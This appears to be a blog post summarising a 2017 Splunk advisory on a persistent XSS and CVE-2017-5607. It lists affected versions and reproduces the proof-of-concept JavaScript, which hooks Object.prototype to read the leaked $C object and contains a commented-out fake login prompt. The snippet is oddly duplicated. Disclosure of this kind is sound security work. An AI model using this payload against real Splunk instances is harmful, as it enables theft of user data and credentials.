Splunk is a big data platform and also used in various SOC as SIEM tool for log analysis. Splunk is the leader in Operational Intelligence platform. Splunk customers use the splunk to do monitoring, searching, analyzing and visualize machine data. Volume of data collected in the splunk is very high.
Splunk Enterprise 6.5.3, 6.2.13.1 and Splunk Light 6.5.2
address multiple vulnerabilities:
- Persistent Cross Site Scripting in Splunk Web (SPL-134841)
- Information Leakage via JavaScript (CVE-2017-5607)
Refer this link for the details and mitigation for both the
vulnerabilities : https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607
Affected Products and Components
Persistent Cross Site Scripting in Splunk Web (SPL-134841)
Affected Product Versions: Splunk Enterprise versions 6.5.x
before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.14 and
Splunk Light before 6.5.2
Affected Components: All Splunk Enterprise components
running Splunk Web.
Information Leakage via JavaScript (CVE-2017-5607)
Affected Product Versions: Splunk Enterprise versions 6.5.x
before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.13.1,
6.1.x before 6.1.13, 6.0.x before 6.0.14, 5.0.x before 5.0.18 and Splunk Light
before 6.5.2
Affected Components: All Splunk Enterprise components.
Below the proof-of-concept JavaScript code published in the advisory:
<script>
Object.defineProperty( Object.prototype, “$C”, { set:function(val){
//prompt(“Splunk Timed out:\nPlease Login to Splunk\nUsername:
“+val.USERNAME, “Password”)
for(var i in val){
alert(“”+i+” “+val[i]);
}
}
});
</script>
Object.defineProperty( Object.prototype, “$C”, { set:function(val){
//prompt(“Splunk Timed out:\nPlease Login to Splunk\nUsername:
“+val.USERNAME, “Password”)
for(var i in val){
alert(“”+i+” “+val[i]);
}
}
});
</script>
For more details regarding information leakage via
Javascript: http://hyp3rlinx.altervista.org/advisories/SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt
It contains exploit/POC and how to produce the exploit : http://seclists.org/fulldisclosure/2017/Mar/89
Post created by
No comments:
Post a Comment